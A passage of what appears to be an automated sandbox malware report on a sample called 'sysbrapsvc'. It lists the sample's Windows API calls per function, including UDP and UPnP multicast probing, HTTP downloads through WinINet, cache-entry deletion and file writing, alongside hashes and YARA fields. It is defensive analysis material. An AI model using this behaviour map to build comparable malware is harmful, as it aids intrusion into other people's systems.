                                                                                • Opcode Fuzzy Hash: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
                                                                                • Instruction Fuzzy Hash: 5D310A74A00208EFDB04DF98D889B9EBBB5FF49308F0085A9E905A7390D775EA95CF54
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl_aullshr
                                                                                • String ID:
                                                                                • API String ID: 673498613-0
                                                                                • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction ID: 0b1db91c5ce03941f8675f6ecb7f2ec56fce17a7f2d6269111b0fb586e4650a4
                                                                                • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction Fuzzy Hash: 27111F326005186B8B10EF9EC48268ABBD6EF84361B15C136FC2CDF359D634E9414BD4
                                                                                APIs
                                                                                • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                • htons.WS2_32(?), ref: 00401281
                                                                                • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                • String ID: pdu
                                                                                • API String ID: 2164660128-2320407122
                                                                                • Opcode ID: 7072d3894e9b5df0fcc29a717805562125ff7a0b34c599f89603ca4f9de7a5ac
                                                                                • Instruction ID: 1b6d4435c5f8e1f149c0fb86e6a0c1a3006a9f031597685944d6c13f048a50c8
                                                                                • Opcode Fuzzy Hash: 7072d3894e9b5df0fcc29a717805562125ff7a0b34c599f89603ca4f9de7a5ac
                                                                                • Instruction Fuzzy Hash: E931B2362083009BC710DF69D884A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                APIs
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3966618661-0
                                                                                • Opcode ID: 465430f324d41f9d9d9732ee1befa355f4717a0d242bba6110d7f62502904e98
                                                                                • Instruction ID: 9f2c4cc69d55b471d510ac50d158e14e0eacb849a4393371b11790265c13a883
                                                                                • Opcode Fuzzy Hash: 465430f324d41f9d9d9732ee1befa355f4717a0d242bba6110d7f62502904e98
                                                                                • Instruction Fuzzy Hash: 5841D175604B02ABC714DB38D848797F3A4BF84310F18823EE86D933D1E739A855CB99
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(0041AC50,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B0C8
                                                                                • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B0E9
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B0F3
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B0FD
                                                                                • InterlockedExchange.KERNEL32(00419828,0000003D), ref: 0040B10A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                • String ID:
                                                                                • API String ID: 442028454-0
                                                                                • Opcode ID: 5693974f53a6f553ee872c1498f347a7cdbd554753dda3213ec7bc77a9e739f7
                                                                                • Instruction ID: 65abf3b26d1f33ce57344cf3d4c90c2ddc2d392c326f45743aae56010b0155a0
                                                                                • Opcode Fuzzy Hash: 5693974f53a6f553ee872c1498f347a7cdbd554753dda3213ec7bc77a9e739f7
                                                                                • Instruction Fuzzy Hash: D33149B8A40208EBCB14DF94EC45FAEB7B1FB48300F208569E511A7391D775AA51CB9A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl
                                                                                • String ID:
                                                                                • API String ID: 435966717-0
                                                                                • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                                • Instruction ID: b0d0b2528f3aca05c18ea064ccca22ed782aa92eb9f3aacb3aeadda2a23aac7b
                                                                                • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                                • Instruction Fuzzy Hash: 92F01272A01414979B14EEFE84424CAF7E59F88374B218176FD1CE3260E570B90546F1
                                                                                APIs
                                                                                • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                  • Part of subcall function 0040A660: HeapFree.KERNEL32(00000000,00000000,00402612,?,00402612,?), ref: 0040A6BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                • String ID: pdu
                                                                                • API String ID: 309973729-2320407122
                                                                                • Opcode ID: 2fd66f5c1125709e912b082e2c73e8d5efb2a89a668c62a8ecc72b7ea0d0f82b
                                                                                • Instruction ID: 49315f9b5d193dc364c5f28f0bcb7aa8bb44b0403a6660fc991bd28791f727bd
                                                                                • Opcode Fuzzy Hash: 2fd66f5c1125709e912b082e2c73e8d5efb2a89a668c62a8ecc72b7ea0d0f82b
                                                                                • Instruction Fuzzy Hash: A901D6B65003009BCB209F61ECC4D9B7778AF48310708467AFC05AB396CA39E8508775
                                                                                APIs
                                                                                • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                                                                • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                                                                • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeviceDriveQueryType
                                                                                • String ID: \??\
                                                                                • API String ID: 1681518211-3047946824
                                                                                • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                                • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                                                                • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                                • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                                                                APIs
                                                                                • ioctlsocket.WS2_32 ref: 0040112B
                                                                                • recvfrom.WS2_32 ref: 0040119C
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                • String ID:
                                                                                • API String ID: 3980219359-0
                                                                                • Opcode ID: ab8b34524f24c7ff0ec759a8db121372cfa49b223874d41307e8bdf502b19990
                                                                                • Instruction ID: dd229b18b8e608a96638b9a50d19e2d27eaf393d2ffc9a5ffa46aac6cea4a516
                                                                                • Opcode Fuzzy Hash: ab8b34524f24c7ff0ec759a8db121372cfa49b223874d41307e8bdf502b19990
                                                                                • Instruction Fuzzy Hash: 7C21C3B1504301AFD304DF65DC84A6BB7E9EF88318F004A3EF555A6290E774D9588BEA
                                                                                APIs
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                • String ID:
                                                                                • API String ID: 2074799992-0
                                                                                • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                                                                • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                                                                APIs
                                                                                • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                                                                • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                                                                • Sleep.KERNEL32(000003E8), ref: 00407361
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$Sleep
                                                                                • String ID:
                                                                                • API String ID: 672405725-0
                                                                                • Opcode ID: 0889daea8db3d00c114acb4ae5d662601a50873d8cf4ae377a86a09432f2b769
                                                                                • Instruction ID: e789c4acaeed7b47b7c3c4d69342d3bd95a049e3571e2ded942ca122a7fff21c
                                                                                • Opcode Fuzzy Hash: 0889daea8db3d00c114acb4ae5d662601a50873d8cf4ae377a86a09432f2b769
                                                                                • Instruction Fuzzy Hash: A5218175E04208FBDB04DFA4D885B9E7B74AF44309F10C4A9ED416B391D679AB80DB49
                                                                                APIs
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Recv$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 3668019968-0
                                                                                • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                                • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                                                                • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                                • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                                                                APIs
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Send$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 2121970615-0
                                                                                • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                                                                • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0040D8D9
                                                                                • CloseHandle.KERNEL32(?), ref: 0040D908
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D917
                                                                                • DeleteCriticalSection.KERNEL32(?), ref: 0040D924
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                • String ID:
                                                                                • API String ID: 3102160386-0
                                                                                • Opcode ID: 52aae5ad70f9b3043191c8c3e05b1acc6f9f728bea5bc6a869e37892dc5a7148
                                                                                • Instruction ID: 6abb592c5b2ce8a5c046663d5def4690e4bb0a573cdaefcdc4ae98697e0ceaa0
                                                                                • Opcode Fuzzy Hash: 52aae5ad70f9b3043191c8c3e05b1acc6f9f728bea5bc6a869e37892dc5a7148
                                                                                • Instruction Fuzzy Hash: 4E1161B4D00208EBDB08DF94D984A9DB775FF44309F1485A9E806A7341C739EF94DB85
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2223660684-0
                                                                                • Opcode ID: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction ID: 487697b266744d2b5c3d358b1528705abebcded3db4b06867e0c0ac6ea0c4339
                                                                                • Opcode Fuzzy Hash: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction Fuzzy Hash: 4A01F7792423049FC3209F26ED84A9B73F8AF45711F04443EE44693650DB39E401CB28
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,00407ECD), ref: 00406F78
                                                                                • SysAllocString.OLEAUT32(0041AA40), ref: 00406F83
                                                                                • CoUninitialize.OLE32 ref: 00406FA8
                                                                                  • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String$Free$AllocInitializeUninitialize
                                                                                • String ID:
                                                                                • API String ID: 459949847-0
                                                                                • Opcode ID: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction ID: c509d36c12d7ba2a5f650eb278e956dc9bc0801d495f3ab7a1e1adcf34b7a620
                                                                                • Opcode Fuzzy Hash: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction Fuzzy Hash: 57E0DFB4941308FBCB00EBE0EE0EB8D7738EB04315F004078F90267291DABA9E90CB19
                                                                                APIs
                                                                                  • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFreeInstanceString
                                                                                • String ID: Microsoft Corporation
                                                                                • API String ID: 586785272-3838278685
                                                                                • Opcode ID: 0f33dd4f09808e29644e00a9613dd62e49f7ac0aadddbd45ce77e6b9e4c1ac58
                                                                                • Instruction ID: 3bd6e37ccb81fb26e20ba6f4aecac2bab56e95e75b440682a2c5ba52433a4c42
                                                                                • Opcode Fuzzy Hash: 0f33dd4f09808e29644e00a9613dd62e49f7ac0aadddbd45ce77e6b9e4c1ac58
                                                                                • Instruction Fuzzy Hash: 2D91EC75A0410ADFCB04DF94C894AAFB7B5BF49304F208169E515BB3E0D734AD41CBA6
                                                                                APIs
                                                                                  • Part of subcall function 0040E070: memset.NTDLL ref: 0040E098
                                                                                  • Part of subcall function 0040E070: InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                  • Part of subcall function 0040E070: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                  • Part of subcall function 0040E070: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                  • Part of subcall function 0040E070: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                  • Part of subcall function 0040E070: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                  • Part of subcall function 0040E070: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                  • Part of subcall function 0040E070: InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                  • Part of subcall function 0040DF60: SysAllocString.OLEAUT32(00000000), ref: 0040DF8E
                                                                                  • Part of subcall function 0040DF60: CoCreateInstance.OLE32(004128F0,00000000,00004401,004128E0,00000000), ref: 0040DFB6
                                                                                  • Part of subcall function 0040DF60: SysFreeString.OLEAUT32(00000000), ref: 0040E051
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                • String ID: %S%S
                                                                                • API String ID: 1017111014-3267608656
                                                                                • Opcode ID: a146118a585c525953cbf50a01d03d7454997d8c312527b14433dc9a100378f5
                                                                                • Instruction ID: c1d615742e0f1fe272601d31d467041fc69409a08f8fe5a36c80dfd154d40f90
                                                                                • Opcode Fuzzy Hash: a146118a585c525953cbf50a01d03d7454997d8c312527b14433dc9a100378f5
                                                                                • Instruction Fuzzy Hash: 5F414BB5E0020A9FCB04DFE4C885AEFB7B9BF48304F148569E505B7390D738AA45CBA5
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407EC8), ref: 0040DAFA
                                                                                  • Part of subcall function 0040DBC0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                  • Part of subcall function 0040DBC0: htons.WS2_32(0000076C), ref: 0040DC10
                                                                                  • Part of subcall function 0040DBC0: inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                  • Part of subcall function 0040DBC0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040DBC0: bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                  • Part of subcall function 0040DBC0: lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                  • Part of subcall function 0040DBC0: sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                  • Part of subcall function 0040DBC0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Strings
                                                                                Memory Dump Source
